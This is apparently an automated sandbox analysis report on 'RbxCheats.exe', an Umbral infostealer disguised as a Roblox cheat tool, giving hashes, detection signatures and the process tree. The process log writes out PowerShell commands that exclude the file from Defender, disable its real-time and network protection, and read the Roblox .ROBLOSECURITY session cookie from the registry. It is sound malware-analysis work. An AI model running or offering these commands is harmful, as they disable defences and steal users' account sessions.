Analysis

  • max time kernel
    84s
  • max time network
    91s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-06-2023 17:07

General

  • Target

    RbxCheats.exe

  • Size

    217KB

  • MD5

    84fe5aaf9d71e59205c851af53d6a1c7

  • SHA1

    1b93e136c567dce28cccd900a02b694d9f488d86

  • SHA256

    81046d6d4e474115dd898d8e4718bc2ba144928461baa26e23f26d73d8e3f2f7

  • SHA512

    db3bfcbccd1b6e22754fd40841f2b2f0d229852879ab1c10e214d8185e5c29f8a8d3e318182c80a2887cf77f7e59aa3e95088b2901eb96720afd9e4f7d775a2d

  • SSDEEP

    3072:WlP/chtWkOIGSAvD6vdnsUSaNZZDOAuIXk0IIIIIIEIIIIIIIIIIIlTIIIIIIIII:OcyHIGadsUSsZDO7+8eNHpDS

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe
    "C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RbxCheats.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3796
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4036
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3064
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5032
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:1400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1572
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:2692

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      d28a889fd956d5cb3accfbaf1143eb6f

      SHA1

      157ba54b365341f8ff06707d996b3635da8446f7

      SHA256

      21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

      SHA512

      0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      5ae6535f0a379e0d7d5abab83390d5c5

      SHA1

      f8231cd53b365100f267f7b4c17b985671057bad

      SHA256

      d600a6d0007c3a73f6ec4c7f9e211c2df282280eda8237bc1b2df118d15c6d6f

      SHA512

      eae4c5736c3e9beac89b8f580c227def39238e3b22f5cbd5b21ed5ea776396003326a2e48a237cb91a9a75f5e29646f875caa668e9b54da60bea150f83a96664

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      d3235ed022a42ec4338123ab87144afa

      SHA1

      5058608bc0deb720a585a2304a8f7cf63a50a315

      SHA256

      10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

      SHA512

      236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      1146cc324c6553c3f7b446c62a8a35f7

      SHA1

      dbac476e76f6232964982f75b5a8647a458afb21

      SHA256

      4d4b7b94d8a777501c0cc070f9ecf6d5d6790618cd2f6d3c42043ccda2cfda99

      SHA512

      e4cd36ee64aa9dbeb6cd587f0d3e8c77a1a092dda39b4e847be18e57b0b7e01c4b95b660fa973420f29f59828c5b094fe989fc9d1b4b89d62decb0c2da9c4ccf

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_coohzo2w.ok1.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1416-177-0x000001353B860000-0x000001353B870000-memory.dmp

      Filesize

      64KB

    • memory/1416-178-0x000001353B860000-0x000001353B870000-memory.dmp

      Filesize

      64KB

    • memory/1572-217-0x0000022F35A60000-0x0000022F35A70000-memory.dmp

      Filesize

      64KB

    • memory/1572-218-0x0000022F35A60000-0x0000022F35A70000-memory.dmp

      Filesize

      64KB

    • memory/2640-161-0x0000023CE77E0000-0x0000023CE77F0000-memory.dmp

      Filesize

      64KB

    • memory/2640-159-0x0000023CE77E0000-0x0000023CE77F0000-memory.dmp

      Filesize

      64KB

    • memory/2640-160-0x0000023CE77E0000-0x0000023CE77F0000-memory.dmp

      Filesize

      64KB

    • memory/3796-136-0x0000027CA2830000-0x0000027CA2852000-memory.dmp

      Filesize

      136KB

    • memory/3796-135-0x0000027C88090000-0x0000027C880A0000-memory.dmp

      Filesize

      64KB

    • memory/4036-200-0x000001FDBFA40000-0x000001FDBFA50000-memory.dmp

      Filesize

      64KB

    • memory/4036-199-0x000001FDBFA40000-0x000001FDBFA50000-memory.dmp

      Filesize

      64KB

    • memory/4664-166-0x00000202FF700000-0x00000202FF71E000-memory.dmp

      Filesize

      120KB

    • memory/4664-133-0x00000202FF3F0000-0x00000202FF42C000-memory.dmp

      Filesize

      240KB

    • memory/4664-203-0x00000202FF6F0000-0x00000202FF6FA000-memory.dmp

      Filesize

      40KB

    • memory/4664-204-0x00000202FF740000-0x00000202FF752000-memory.dmp

      Filesize

      72KB

    • memory/4664-165-0x00000202FF7E0000-0x00000202FF830000-memory.dmp

      Filesize

      320KB

    • memory/4664-164-0x00000202FF760000-0x00000202FF7D6000-memory.dmp

      Filesize

      472KB

    • memory/4664-134-0x000002029A290000-0x000002029A2A0000-memory.dmp

      Filesize

      64KB

    • memory/4664-224-0x000002029A480000-0x000002029A629000-memory.dmp

      Filesize

      1.7MB